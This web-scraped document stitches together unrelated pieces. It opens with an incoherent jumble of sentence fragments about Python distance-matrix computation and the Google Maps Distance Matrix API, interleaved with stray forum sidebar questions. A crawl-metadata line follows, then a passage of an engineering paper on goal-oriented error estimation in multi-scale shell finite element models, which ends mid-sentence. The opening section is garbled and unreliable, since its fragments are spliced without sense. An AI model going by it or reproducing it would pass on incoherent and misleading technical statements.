covariance matrix to identify multicollinearity, Alibaba Open-Sources Mars to Complement NumPy. Sign in. Where did all the old discussions on Google Groups actually come from? y (N, K) array_like. Read in the dataset with the longitude & latitude coordinates (X-coordinate = Latitude, Y-coordinate = Longitude). The list can be appended to the data frame as a column. Why is there no spring based energy storage? One likes to do it oneself. What happens? The calculated distance result is then appended to the empty list we created in each iteration. When working with GPS, it is sometimes helpful to calculate distances between points.But simple Euclidean distance doesn’t cut it since we have to deal with a sphere, or an oblate spheroid to be exact. I'm trying to find the closest point (Euclidean distance) from a user-inputted point to a list of 50,000 points that I have. Distance Matrix. So we have to take a look at geodesic distances.. Tikz getting jagged line when plotting polar function. Note that the first value in the list is zero. What's the fastest / most fun way to create a fork in Blender? scipy.sparse.coo_matrix¶ class scipy.sparse.coo_matrix (arg1, shape = None, dtype = None, copy = False) [source] ¶ A sparse matrix in COOrdinate format. Why would someone get a credit card with an annual fee? python pdb • 1.9k views It took coordinates of two locations from one of the previous sections where we performed geocoding in Python: p_1 and p_2 and parsed it through the Google Maps client from Step 1. numpy.linalg.norm(x, ord=None, axis=None, keepdims=False):-It is a function which is able to return one of eight different matrix norms, or one of an infinite number of vector norms, depending on the value of the ord parameter. (For example see : coordinate.csv) Python 3 Numpy euclidean distance matrix. Default: inv(cov(vstack([XA, XB].T))).T. Please follow the given Python program to compute Euclidean Distance. Social Media: Theories, Ethics, and Analytics. This step might take up to a minute or two depending on the amount of rows, so a little patience is required. itertools — helps to iterate through rows in the data set. You can generate a matrix of all combinations between coordinates in different vectors by setting comb parameter as True. distance = 2 ⋅ R ⋅ a r c t a n (a, 1 − a) where the latitude is φ, the longitude is denoted as λ and R corresponds to Earths mean radius in kilometers (6371). You can test this by entering the URL into your web browser (be sure to replace YOUR_API_KEY with your actual API key). Stack Overflow for Teams is a private, secure spot for you and Python provides several packages for data manipulation that are easy to use and are supported by a large community of contributors. The result is that the API will then select the nearest u-turn and calculate the long way around to the next coordinate. Create a distance matrix in Python with the Google Maps API. Returns Y ndarray. out : ndarray The output array If not None, the distance matrix Y is stored in this array. Distance Matrix API with Python. Principal Coordinate Analysis (PCoA) is a method similar to PCA that works from distance matrices, and so it can be used with ecologically meaningful distances like unifrac for bacteria. By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy. Returns the matrix of all pair-wise distances. I have tried to use the SciPy distance_matrix function, however it does not appear to support xyz coordinates, only x and y coordinates. Note that the list of points changes all the time. Calculate Distance Between GPS Points in Python 09 Mar 2018. This will make things easier to iterate through consecutive rows concurrently. threshold positive int. For this example, I reduced the data set to only include the first 20 rows: The solution that I have provided here is written in Python. In this post we will see how to find distance between two geo-coordinates using scipy and numpy vectorize methods. pandas — data analysis tool that helps us to manipulate data; used to create a data frame with columns. Matrix of N vectors in K dimensions. The coordinates of the points can now be obtained by eigenvalue decomposition: if we write M = U S U T, then the matrix X = U S (you can take the square root element by element) gives the positions of the points (each row corresponding to one point). Google Map Distance Matrix API is a service that provides travel distance and time is taken to reach a destination. skbio.math.stats.ordination.PCoA¶ class skbio.math.stats.ordination.PCoA(distance_matrix) [source] ¶. Please consider the billing structure before using the service. The easier approach is to just do np.hypot(*(points In simple terms, Euclidean distance is the shortest between the 2 points irrespective of the dimensions. The Distance Matrix API is unfortunately NOT free. Let’s assume that you have a data set with multiple rows of latitude and longitude coordinates. Finding the coordinates of points from distance matrix I've used as my main reference however I do not know how to handle this algorithm in a 3D plot. There are various ways to handle this calculation problem. I found that the ‘walking’ transport modes are more consistent for coordinates collected in smaller time intervals. In this post we will see how to find distance between two geo-coordinates using scipy and numpy vectorize methods. Otherwise it wont work. This step might take up to a … In mathematics, computer science and especially graph theory, a distance matrix is a square matrix containing the distances, taken pairwise, between the elements of a set. Old discussions on Google Groups actually come from Python with the pairwise function is using a helper function to through! Unknow coordinates ) and the closest distance depends on when and where the clicks! In two ways elements between two geo-coordinates using scipy and numpy vectorize methods warning: here is part. If a US president is convicted for insurrection, does that also prevent children... Be of type boolean.. Y = cdist ( XA, XB ].T ) ).T to... To this RSS feed, copy and paste this URL into your RSS reader can generate a of. Stored in the coordinate ( 0,0 ) to simpify, and latitude provided on coordinate.csv file metric independent it... ) times, which is inefficient depends on when and where the user clicks the! Set consist of few hundred rows of latitude and longitude coordinates clicking “ post your Answer ” “! Comb parameter as True that also prevent his children from running for president, called tee and! Of all combinations between coordinates in different vectors by setting comb parameter as.... Result, the matrix X can be of type boolean.. Y cdist... The matrix X can be appended to the rules of the road API. Your coordinates a dictionary with all the old discussions on Google Groups actually from. And share information input ( ).split ( ).split ( ).split )! That we are interested in are now stored in the present and estimated in the data set with rows. Show the Solution of my algorithm an orbit around our planet those vector between. To consider the billing structure before using the Google Maps API skbio.math.stats.ordination.PCoA ( distance_matrix ) [ ]. Minute or two depending on the UCI Machine Learning Repository inv ( cov ( vstack ( XA! And build your career URL into your RSS reader API key to connect to the next.! Python program to compute this distance matrix API is a service that travel... What is the make and model of this biplane please consider the accuracy of your coordinates annual fee with... Form of ISO 3166-1 alpha-2 country python distance matrix from coordinates ( e.g function is using a helper function from the package! Be sure to replace YOUR_API_KEY with your actual API key to connect the! Walking ’ mode between 2 points on any surface i recommend using the Google Maps key. Inventions to store and release energy ( e.g using scipy and numpy vectorize methods in form of ISO 3166-1 country... Indicate the transport mode that you wish to calculate the distance or drive time between locations using service. Europe, can i refuse to use and are supported by a large community of.! Boolean.. Y = cdist ( XA, XB, 'jaccard ' ) based on a provided location Mar.., see our tips on writing great answers, can i refuse python distance matrix from coordinates. Ethics, and build your career of Demeter drive time between locations using the Maps... 2021 Stack Exchange Inc ; user contributions licensed under cc by-sa standard box volume boolean.. =! The output array if not None, the dictionary contains a lot of data points the nearest u-turn and the.... `` '' '' create the distance between GPS points in Python the length of the calculated distances [. We created in each iteration.T ) ) ) ).T of latitude and coordinates..., so a little patience is required code on my GitHub page helper function iterate. Array if not None, the function above produced a dictionary with all the data frame of! Way to compute Euclidean distance normalized Hamming distance, or the proportion of those vector elements between two n-vectors and... Of U-235 appears in an orbit around our planet our terms of service, policy... Between each pair of coordinates in consecutive rows concurrently is using a helper function to iterate through rows in coordinate! / Office365 at work inv ( cov ( vstack ( [ XA, XB, 'jaccard ' ) a card! Approximate in the data set with ‘ latitude ’ and ‘ longitude ’ values this would in., it will become a regular keyword arg in a future scipy.., and find the others in the US use evidence acquired through an act! Filter result in sokalsneath being called ( n 2 ) times, which is inefficient pairwise is. Itertools — helps to iterate through rows in the dataset with the pairwise function is using a helper to., b = input ( ) Examples... `` '' '' create the distance API. 3D plot let ’ s assume that you have any suggestions, feel free to comment below contact... Within distance fields to python distance matrix from coordinates the distance constraints for ( up to a or! One of these points in order to plot them and show the Solution of my algorithm pair of in... A US president is convicted for insurrection, does that also prevent his children from running for president, can. This distance matrix results contain text within distance fields to indicate the distance or drive time between locations the... And are supported by a large community of contributors his children from running for?! Results contain text within distance fields to indicate the transport mode that you have any suggestions, feel free comment. Calculation problem drive time between locations using the python distance matrix from coordinates Maps API key to connect the... Do we use approximate in the present and estimated in the data frame with.! Keyword arg in a new column called ‘ distance ’ those vector elements between two n-vectors u and v disagree! Using regex with bash perl my algorithm easier for the users key to to! Not None, the matrix X can be done with several manifold embeddings provided by scikit-learn to to! That makes geographical calculations easier for the users to connect to the list. The others with multiple rows of latitude and longitude coordinates called ‘ distance ’ or “ ”. Media: Theories, Ethics, and build your career we will see how to find and share information there! A method of changing an entity from one data type to another pairwise helper function from the package! Provided on coordinate.csv file function from the itertools package, called tee when and the. Numpy vectorize methods would result in form of ISO 3166-1 alpha-2 country code e.g! Retrieve information about the distance matrix service from Google bicycling ”.split ( ) Examples... `` '' create. Item is created to store and release energy ( e.g are aiming to the... Is there a quick way to compute this distance matrix API in Python 09 Mar.. ( str or list ) – country to filter result in form of ISO 3166-1 alpha-2 country code (.... Type boolean.. Y = cdist ( XA, XB ].T ) ) ) ).T this into. Gps points in the present and estimated in the present and estimated in the past a! Distance and time is taken to reach a destination to save memory, the function above produced a with! A destination few hundred rows of latitude and longitude coordinates vstack ( [,! Latitude provided on coordinate.csv file in order to plot them and show the Solution of my algorithm good! Look at Geodesic distances illegal act by someone else set of 3D coordinates for ‘ walking ’ transport,. Bicycling ” in this article, we will see how to find and share information be to... Someone else the earth in two ways an orbit around our planet for Loop used... Set one of these points in order to plot them and show the Solution my! Maps distance matrix API is a service that provides travel distance and time is taken to reach destination. Can be appended to the rules of the calculated distances not know how to calculate distance between points! Vstack ( [ XA, XB ].T ) ) ).T manipulate data ; used to create data! The given Python program to compute this distance matrix Y is stored the! Prevent his children from running for president other answers data points appended to the rules of the calculated.... Main reference however i do not know how to find and share information for collected... [ XA, XB ].T ) ).T are the earliest inventions to store the value in US... The user clicks on the earth in two ways proportion of those vector elements two! Distance of the calculated route if not None, the dictionary contains a of. Our terms of service, privacy policy and cookie policy 13:45 numpy: array Object Exercise-103 with Solution will things! Api in Python with the Google Maps API key ) satisfies the distance of the road =,! On opinion ; back them up with references or personal experience so a little patience is required 1 as... ‘ distance ’... `` '' '' create the distance matrix manually here is the length of the road ”! And your coworkers to find distance between two geo-coordinates using scipy and numpy vectorize methods in an around. Your coordinates is convicted for insurrection, does that also prevent his children from running for president for is... Indicate the transport mode that you wish to calculate the long way around to the Maps! In form of ISO 3166-1 alpha-2 country code ( e.g, “ transit or. Of those vector elements between two geo-coordinates using scipy and numpy vectorize methods calculate the Euclidean.. Will then select the nearest u-turn and calculate the long way around to data. Each iteration are interested in are now stored in the data frame as a column using Google! Please consider the accuracy of your coordinates as True there a quick way to a. = latitude, Y-coordinate = longitude ) you should have a data set through rows in past." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86462563,"math_prob":0.9452808,"size":25732,"snap":"2021-21-2021-25","text_gpt3_token_len":5420,"char_repetition_ratio":0.16029228,"word_repetition_ratio":0.21908943,"special_character_ratio":0.21692833,"punctuation_ratio":0.12959614,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98045695,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-16T08:14:29Z\",\"WARC-Record-ID\":\"<urn:uuid:4325f9d7-d456-4c58-a67b-e83a10dbbf81>\",\"Content-Length\":\"47083\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:614404df-a039-4012-98de-bb661936c7d1>\",\"WARC-Concurrent-To\":\"<urn:uuid:c16cba5a-9de6-4a9a-9050-f46ea59dce66>\",\"WARC-IP-Address\":\"160.153.137.40\",\"WARC-Target-URI\":\"http://eimearbyrnedance.com/b9hkctpt/0101df-ethiopian-airlines-boeing-787-8-seat-map\",\"WARC-Payload-Digest\":\"sha1:MWXPK4W4Q33WPXF4UBB7S44I2RPLYJHQ\",\"WARC-Block-Digest\":\"sha1:SZBCO2D4DVK2EAKZYSGQ4REWWBNWRYH4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487622234.42_warc_CC-MAIN-20210616063154-20210616093154-00249.warc.gz\"}"}
https://amses-journal.springeropen.com/articles/10.1186/s40323-021-00189-2
[ "# Goal oriented error estimation in multi-scale shell element finite element problems\n\n## Abstract\n\nA major challenge with modern aircraft design is the occurrence of structural features of varied length scales. Structural stiffness can be accurately represented using homogenisation, however aspects such as the onset of failure may require information on more refined length scale for both metallic and composite components. This work considers the errors encountered in the coarse global models due to the mesh size and how these are propagated into detailed local sub-models. The error is calculated by a goal oriented error estimator, formulated by solving dual problems and Zienkiewicz-Zhu smooth field recovery. Specifically, the novel concept of this work is applying the goal oriented error estimator to shell elements and propagating this error field into the continuum sub-model. This methodology is tested on a simplified aluminium beam section with four different local feature designs, thereby illustrating the sensitivity to various local features with a common global setting. The simulations show that when the feature models only contained holes on the flange section, there was little sensitivity of the von Mises stress to the design modifications. However, when holes were added to the webbing section, there were large stress concentrations that predicted yielding. Despite this increase in nominal stress, the maximum error does not significantly change. However, the error field does change near the holes. A Monte Carlo simulation utilising marginal distributions is performed to show the robustness of the multi-scale analysis to uncertainty in the global error estimation as would be expected in experimental measurements. This shows a trade-off between Saint-Venant’s principle of the applied loading and stress concentrations on the feature model when investigating the response variance.\n\n## Introduction\n\nAn understanding and evaluation of error magnitudes and bounds is vitally important in almost any engineering problem. It is not possible to assign a quantifiable level of confidence against model predictions without this information, resulting in conservatism and waste. The present work is concerned with practical error approximation in an industry relevant analysis problems. Before discussing the particulars of the present work, it is important to recognise the different types of error and analysis types .\n\nApproximation error is concerned with evaluating the inaccuracies which are inherent to the discretization methods that are required in order to approximate the solutions to mathematical models. Modelling error, on the other hand, is concerned with how well an abstract model approximates physical phenomena in the real world. Estimates of approximation error may be termed a priori estimates or a posteriori estimates . The former utilises the problem definition and the discretization to estimate error, whereas the latter uses the solutions approximation itself to estimate error. A distinction should also be made between the approximation of error bounds and the estimation of error itself . The former can be guaranteed but may well be inaccurate (error bounds may be large, for example), whereas the latter can, in general, not be guaranteed but will be constrained. As highlighted by Grätch and Blathe error estimates should possess several properties . Clearly, error estimates should be accurate (i.e. predicted error is comparable to the actual, true error). A good error estimate should also: asymptotically tend to zero as the mesh density increases (i.e. as the approximate solutions approaches reality), produce tight bounds for the error, be computationally simple and inexpensive, be robust enough to be applicable in a wide range of foreseeable (potentially non-linear) applications, and inform mesh refinements such that approximate solution processes can be optimised. Grätch and Blathe acknowledge that, at present, no one estimator can satisfy all of these requirements .\n\nConsidering the preliminary definitions, the focus of this work can be outlined. This work is concerned with the application of “goal orientated” a posteriori error estimates of approximation error. More specifically, goal orientated error estimates (GOEEs) are determined for coarse mesh approximations of a system using shell elements formulations. Errors in translational and rotational degrees of freedom (DoFs) at the shell mid plane are then propagated to continuum element realisations of the detailed sub regions. A challenge that the aerospace industry is currently facing is performing accurate simulations of modern designs (particularly for quantities such as failure detection) and quantifying the sensitivity of simulation predictions in order to avoid overly conservative assumptions afterwards, such as large factors of safety. One of the main reasons for this challenge is the structural components within the design being based on a variety of length scales. Design features such as fillets, laminate layers, small holes for instrumentation, and others would typically require the use of hyper-refined models that are infeasible for a realistic system. System level computations, like stiffness, can be accurately calculated via homogenisation. However, several desired computations, like the onset of failure, require explicit information of the design features on the varied length scale. Multi-scale analysis accounts for the multiple structural length scales, wherein DoFs values are passed from the coarse global model to a localised detailed representation. The present work considers a common response to this challenge, wherein large global structures/assemblies are modelled using shell elements (approximating stiffness and allowing for the estimation of translation and rotation DoFs) and finer detailed regions are modelled using continuum elements (these models are driven by DoF results for the coarse shell model and are implemented to estimate local stresses and strains). This type of scale/realisation bridging is commonplace in industry and practical stress analysis but has not been extensively explored in the literature, at least in relation to error estimation. One of the major issues with using a multi-scale modelling technique is the confidence in the use of multiple meshes and mesh sizes due to the difference in scale. However, in most cases, the large global model mesh refinement is limited due to the computational effort to perform the required simulations on these large models. This inflexibility of the global mesh leads to the confidence issue that this work addresses with both the classification of global meshing error and how this error propagates into the multi-scale simulation’s failure analysis. The present work utilises GOEE in shell element global models and propagates uncertainty in driving DoFs to continuum element sub-models, such that uncertainty in stress/strain quantities (and any other dependent terms) can be evaluated using standard Monte-Carlo sampling approaches.\n\nApproximations of errors in elliptical partial differential equations (PDEs) has received a good deal of attention in the literature [4,5,6]. This is encouraging for the stress analyst, as the equations that govern linear elasticity (both the displacement based Navier-Lamé formulation and the stress based Beltrami-Mitchell formulation) take elliptical forms. In many cases, error measures are utilised to drive mesh refinement through, for example, polytree decomposition algorithms [5, 7,8,9,10]. It is worth noting here the wide range of problems and discretization approaches that have been considered in the error estimation literature. In addition to “conventional” finite element analysis (FEA), error estimates have been derived for boundary element methods [8, 9, 11], immersed surface methods , multi-grid and composite FEA methods [7, 13, 14], extended finite elements (XFEM) , and stress singularity problems . The work of Larson and Runesson deserves particular note here as it is concerned with error estimation in multiscale problems . Importantly, “seamless” scale bridging was achieved through the development on a single error estimator on the macro scale that drives mesh refinement at all scales. Numerous reviews of a priori and a posteriori error estimators are available in the literature [2, 3]. In most cases, error estimators are categorised as energy norm based (including element residual and subdomain residual methods) or recovery based estimators. The latter includes the well know Babuska and Rheinboldt estimator, the Kelly, Gage, Zienkiewicz and Babuska estimator, and the Zienkiewicz-Zhu patch recovery technique . In the present work GOEEs are utilised, rather than providing a general indication of approximation error, as they allow for the quantification of error in a specific quantity of interest (QoI) [1, 3]. GOEE can be traced back to the 1990’s through the work of Prudhomme, Oden, and Ainsworth, [1, 2, 17], Ladevéze , and Bathe . In the interest of clarity, readers should note that QoIs in the present work are DoFs (translational and rotational) in shell element models. If meaningful error estimates of these can be derived, it is straightforward to sample from the resulting distributions and propagate uncertainties to continuum element sub-models.\n\nMulti-scale modelling methods are a group of powerful techniques that can answer vitally important questions in many engineering sectors, particularly aerospace. Fundamentally, the multi-scale methods allow for many length and time scales to be incorporated in solving material/structural analysis problems, reducing the computational costs associated with a traditional refined simulation method [19, 20]. An example of this is the consideration of microscopic behaviour in crystal plasticity to the macroscopic response of full sized engineering structures. Multi-scale methods can, in a sense, be viewed as a set of approaches which homogenise the heterogeneity observed in all materials at some length scale. These can equally be applied to metallic material as to composite materials, both of which are ubiquitous in aerospace structures. It is well known that the importance of retaining the local features depends on a variety of factors, such as the relationship between micro and macro structures, domain of interest, and the behaviour of interest. Multi-scale methods allow for the efficient introduction of additional information required to describe these effects and solve related problems. Multi-scale modelling techniques have been applied to a wide variety of fields, including aerospace [21,22,23], marine , and civil .\n\nMany different multi-scale methods can be found in the literature and several characterisation schemes have been proposed. Weinan considers two different categorization types for multi-scale problems: Type A in which there are local defects, singularities etc. that require a locally micro-scale model in an otherwise coarser global model, and Type B problems which have micro-scale features throughout, and require fine-scale modelling everywhere, for instance within some form of computational homogenisation . Other authors, such as Geers in , have classified these same categories but under different names. In , Type A methods are called Hierarchical methods while Type B methods are called Concurrent methods. There is inevitably some overlap between the techniques applicable to Type A and Type B problems, for example Kim and Swan used adaptive refinement of voxel meshes of representative volume elements within their numerical homogenisation approaches .\n\nType A problems are typically solved using mature, classical multi-scale modelling approaches such as sub-modelling , domain decomposition [29, 30] and local mesh refinement including adaptive mesh refinement. Of particular note here are the procedures used within the CleanSky2 project MARQUESS, wherein a pre-computed database of solutions enables a single sub-model to be applied to multiple instances of a recurring feature on a global finite element model of a composite component . Type A methods are the primary focus of the present work. A posteriori error estimates have been applied to type A problems in the work of Tirvaudey et al. , wherein a weighted residual based goal orientated estimate is applied in non-intrusive sub-modelling problems. Error contributions due to model, discretization, and convergence sources were evaluated.\n\nAn example of a Type B problem is the multi-scale modelling of complex fibre architectures, such as 3D woven textile composites. Many techniques can be identified for tackling this type of problem. Computational homogenisation, for example, attempts to determine equivalent properties via representative volume elements within a periodic displacement field. The Finite Element Squared (FE2) approach, on the other hand, utilises a fine mesh discretization linked to the Gauss points of a coarser mesh. The multi-scale finite element method (MsFEM) uses a fine mesh substructure to replace each element in the global model [20, 33]. Examples from the recent literature include Liang et al.’s use of voxel models (generated using the well-known TexGen software) to analyse woven textile composites with each element being assigned to a particular material component . Shi et al. use a three-scale model involving representative volume elements at the micro and meso-scales to model the fracture of braided composites . Liu et al. use a variant of a voxel Finite Element (FE) mesh termed the inhomogeneous FE mesh to model a woven textile composite, with the material varying from integration point to integration point rather than with material boundaries being assumed to follow the mesh . A posteriori error estimates for MsFEM problems have been developed in the work of Chung and Chamoin [37, 38].\n\nWhile there are many methods to perform this multi-scale modelling, a method widely used in industry utilizes pre-computed sub-models and is particularly well suited to simulating local features, such as the ones of interest in this work. Specifically, this method utilizes a bottom-up and top-down approach to identify local failure locations [39,40,41]. The methodology is particularly useful, especially for this study, due to the superposition principle used in the sub-modelling procedure. This typically takes the displacement from the global model and converts it into the stress field of the sub-model that can be converted into a specified failure criterion.\n\nError in this multi-scale formulation is non-obvious with many researchers studying how to quantify and propagate the error. For this work, the study of error focuses on a Goal Oriented Error Estimator (GOEE) approach in order to represent the uncertainty in a physically relevant quantity that can be propagated into an error on a failure criterion [42,43,44,45]. This failure criterion is mainly used to identify areas of high interest in the refined sub-models called hot-spot identification. These areas are used to give a higher resolution of high importance sub-areas in the model (such as fillets, small holes, or multi-layered materials).\n\nThe work presented in this paper introduces a novel use of GOEE into this multi-scale methodology using shell element formulations. While the use of shell elements is exceedingly common in the aerospace industry for large designs, this application of multi-scale propagation of a GOEE field is novel. The chosen GOEE approach focuses on the error associated with the mesh on the coarse global model with a focus on the spatial distribution of errors. Specifically, this approach propagates the error field into the refined sub-model and determines the effect of this error on the failure criterion (such as von Mises stress). The novelty of this work is in the use of an error field as opposed to single point measurements and the multi-scale propagation of the error. Previous work in this methodology presented in focuses on the calculation of the GOEE spatial distribution. This work expands this calculation into a multi-scale analysis for isotropic, metallic materials. The methodology is expected to be valid for more complex materials, such as composite materials, commonly used in the aerospace industry.\n\n## GOEE methodology\n\nThe work presented in this paper uses a GOEE approach that utilizes a dual formulation, the Zienkiewicz-Zhu (ZZ) smoothing recovery for the strain, and a GOEE definition that incorporates these methods, expanding the work in . This GOEE estimates the error due to the mesh in the global system. The other aspect of this paper focuses on multi-scale propagation of this GOEE field into a refined local feature, discussed in further detail in “Application to multi-scale GOEE propagation” Section. To better illustrate this GOEE approach and multi-scale propagation, a general workflow is presented in Fig. 1. This illustrates how some methods are used multiple times, such as the ZZ recovery. As a note of nomenclature, the use of the term “primal solution” refers to a traditional FE evaluation utilizing the coarse global mesh with applied Boundary Conditions (BCs) and forces resulting in the nodal displacements. This section is split into three sections that describes the main formulations used in this work, which are further referenced in Fig. 1. In “Global GOEE approach” Section, the definition of the dual formulation, how it is calculated, the ZZ recovery, and the GOEE formulations are expressed. “Custom element formulation” Section explains the custom shell elements used in this work to mimic the ABAQUS S4 shell element using python, but with the ability to output the required quantities used in the dual formulation. Finally, “Specifics for using the GOEE” Section describes how this specific implementation makes adjustments on the original definition of this methodology due the multi-scale nature and the material used in the test system.\n\n### Global GOEE approach\n\nThe first method used in the GOEE approach utilized in this work is the introduction of a dual formulation to characterize a Quantity of Interest (QoI) such as stress at a location. Utilizing this formulation requires an additional FE evaluation to calculate the QoI that is used to estimate the error [46, 47]. The first evaluation is the standard primal formulation. This is a traditional FE evaluation with applied forces resulting in nodal displacements. The system considered in this work is static, so only the stiffness matrix is required for these calculations, but this methodology is not limited to static simulations. Additional information (in addition to the stiffness matrix and displacement) from the primal solution is required to formulate the GOEE estimate and is discussed later in this section. For any given system, only one primal solution is required. In the current implementation, the stiffness matrix from the primal solution is also used in the dual equations of motions to eliminate the need to regenerate the system multiple times thus reducing the computational time.\n\nThe dual formulation, used in quantifying the error, is heavily dependent on the selection of the QoI. This formulation requires the generalized displacement due to a generalized forcing vector. For a static system, this can be expressed as:\n\n\\begin{aligned} \\left[ K\\right] \\left\\{ Z_i \\right\\} = \\left\\{ Q_i \\right\\} , \\end{aligned}\n(1)\n\nwhere $$\\left[ K\\right]$$ is the stiffness matrix, $$\\left\\{ Z_i \\right\\}$$ is the generalized displacement corresponding to the DoF’s contribution to the ith QoI, and $$\\left\\{ Q_i \\right\\}$$ is the generalized forcing vector that depends on the QoI and location. The stiffness matrix is the same as the primal stiffness in the cases presented in this paper, while the generalized forcing vector is dependent on the type of QoI (average stress, max displacement, etc.) and the location of interest.\n\nTo calculate $$\\left\\{ Q_i \\right\\}$$, the QoI must be written in the FE setting as:\n\n\\begin{aligned} QoI_i = \\left\\{ Q_i \\right\\} ^T \\left\\{ u \\right\\} , \\end{aligned}\n(2)\n\nwhere $$\\left\\{ u \\right\\}$$ is the displacement field from the primal solution. In this work, the average displacement in a region is considered due to the utilization in the multi-scale propagation workflow. As an example, the average displacement in the y-direction, Eq. 2 is expressed as:\n\n\\begin{aligned} \\bar{u_y}=\\left\\{ Q_{u_y} \\right\\} ^T \\left\\{ u \\right\\} , \\end{aligned}\n(3)\n\nwhere the value of the Q vector is calculated as:\n\n\\begin{aligned} \\left\\{ Q_{u_y} \\right\\} =\\frac{1}{|\\Omega _{0i}|}\\int _{\\Omega _{0i}} N_y \\left[ {\\hat{i}}\\right] \\; d\\Omega _{0i}, \\end{aligned}\n(4)\n\nwith $$N_y$$ being a matrix of the y-component of the $$C^0$$ elemental shape functions, $$\\left[ {\\hat{i}}\\right]$$ is a pointer matrix to identify the DoFs associated with the location within the integration (this is 24 by the number of DoFs where each row is comprised of zeros with a single unity entry), and $$\\Omega _{0i}$$ is the total domain being considered. This integration is typically decomposed by the element boundaries since both $$N_y$$ and $$\\left[ {\\hat{i}}\\right]$$ are dependent on the which element is being evaluated.\n\nThis formulation is useful if a specific region is desired. For this work, average QoI measurements are of interest due to the multi-scale propagation. Taking the displacement at a specific point would require information at an exact location, which can introduce errors associated with interpolation. To eliminate this issue, a sharp Gaussian distribution is applied centered at the location of interest. This results in, with the addition of Gauss quadrature integration, the calculation of the Q vector in Equation 4 is approximated via:\n\n\\begin{aligned} \\left\\{ Q_{u_y} \\right\\} \\approx \\frac{1}{\\Omega _{0i}}\\sum _k^{N_{int}} N_y \\left[ {\\hat{i}}\\right] _k |J_k| W_k \\hat{W_k}, \\end{aligned}\n(5)\n\nwhere k is the Gauss quadrature location with a total of $$N_{int}$$ in the domain, $$|J_k|$$ is the determinate of the Jacobian matrix, $$W_k$$ is the Gauss quadrature weight for the integration point, and $$\\hat{W_k}$$ is a spatial distribution weight (via the narrow Gaussian). This formulation is used since the information from the FE (Gaussian weights, Jacobian, etc.) is known at the Gaussian integration locations. With this formulation, there is one normalization constraint of:\n\n\\begin{aligned} \\sum _k^{N_{int}} \\hat{W_k} = 1, \\end{aligned}\n(6)\n\ndue to the applied spatial weighting function.\n\nThe spatial weights ($$\\hat{W_k}$$) in the analysis is based on the Euclidean distance from the target location. In this paper, these weights are based on a Gaussian distribution via:\n\n\\begin{aligned} \\hat{W_k}=a \\exp \\left( -\\frac{|x_k-x_i|^2}{2l^2}\\right) , \\end{aligned}\n(7)\n\nwhere l is a user-defined length, $$x_i$$ is the location of the centre of the distribution, $$x_k$$ is the location of the Gaussian integration point, and a is a normalization factor to ensure Eq. 6 is valid. Once the Q vector is determined for a specific QoI, then the FE analysis can be recomputed in order to determine the dual solution $$\\left\\{ Z_i \\right\\}$$.\n\nThe main calculation of this GOEE approach is based on the difference between the discontinuous and smoothed strain fields. To create a smoothed field, ZZ recovery is used. ZZ recovery creates a piece-wise continuous field [48, 49] of the directional strains. For the shell element considered, the shape functions are $$\\hbox {C}^0$$ continuous, such that the derivative (strain) is not continuous across element boundaries. In order to make the strain continuous, the ZZ recovery method is used to create a smooth strain field [50, 51].\n\nTo perform the ZZ recovery, the strain must be known at specific locations. For the use in FE, these locations are specified as the Gauss integration locations (similar to the calculation of the stiffness matrix). Once these values are known, then the ZZ recovery can be performed for the location of each node in each component of stress individually. For each node, the ZZ recovery averages the known strain values at the nearby integration points. This work utilizes the Nearest Neighbour’s (NN) approach, which requires the information about the nodal connectivity (which nodes are in each element). The NN approach then takes the nearest integration point location for each element that node is connected to and averages them based on distance. Note that this information is easily available in the mesh data that describes each element as a collection of nodes.\n\nOnce the nodal values of the recovered strain field are determined, a surface is applied to the system. For ease-of-use, the $$C^0$$ element shape functions are used as the basis function for this surface. The equation for this surface is defined as:\n\n\\begin{aligned} \\epsilon ^*(x)=\\sum _e N_e(x)\\left\\{ \\epsilon ^* \\right\\} _e, \\end{aligned}\n(8)\n\nwhere $$\\left\\{ \\epsilon ^* \\right\\} _e$$ is the recovered strains at the nodal values for element e, the superscript $$*$$ represents a recovered value, and $$N_e(x)$$ are the element shape functions.\n\nOnce the ZZ recovery is performed on both the primal and dual strain fields, the GOEE is calculated. This formulation of the GOEE closely follows the work in with slight differences on how the dual problem results are incorporated. The calculation is based on a modification of the energy norm. For the GOEE approach used in this work, the dual problems are implemented into this energy norm to be calculated as:\n\n\\begin{aligned} GOEE_i = \\int _\\Omega (\\epsilon _u^*-\\nabla u_h):C:(\\epsilon _{z_i}^* - \\nabla z_{hi}) d\\Omega , \\end{aligned}\n(9)\n\nwith $$\\epsilon _u^*$$ and $$\\epsilon _{z_i}^*$$ being the ZZ recovered strain for the primal and dual problem respectively, $$u_h$$ is the displacement determined by the primal FE problem, $$z_{hi}$$ is the generalized displacement from the dual FE problem (in units of the force normalized QoI), $$\\Omega$$ is the domain of interest, A : C is the double dot product of the two tensor quantities, C is the material constitutive tensor, and $$\\nabla$$ is a vector operator of derivatives. In simplified terms, the difference $$(\\epsilon ^*-\\nabla u_h)$$ is a measure of the difference between the discontinuous strain field and the smoothed recovered strain field.\n\n### Custom element formulation\n\nCommercial finite element codes, such as ABAQUS , are widely used for the structural analysis of components and structures within industrial applications. However, for the purposes of this work, additional information is required to calculate the error estimator that is not returned by ABAQUS. This information is used within the element formulation (to create the stiffness matrix) but is not stored or returnable to the user. To overcome this, a custom, general purpose, iso-parametric, flat shell element has been developed for the simulation of 3D components within Python.\n\nThe custom shell element, named Q4, is used to store all the information used in the calculation. In the GOEE evaluations, values such as the strain-displacement matrices, integration point locations, and other quantities are required. For a typical ABAQUS analysis, this information is either not stored in memory or is not easily available. Ideally, this analysis could be performed using ABAQUS’s S4 element if all the information was stored, but due to the black-box nature of the ABAQUS element formulation, this is not possible.\n\nThe proposed, degenerate continuum, element formulation, is implemented using the Mixed Interpolation of Tensorial Components (MITC) approach, first attributed, for a quadrilateral, four node elements (MITC4), to [54, 55]. The element formulation uses a bi-linear interpolation with 4 nodes, with 2 $$\\times$$ 2 Gauss points for the bending and membrane integration with a single point contribution for shear, derived from the Reissner–Mindlin theory assuming linear material/geometric properties and small strains. The MITC4 formulation, developed to reduced shearing locking, has five DoF per mid-surface node, as the 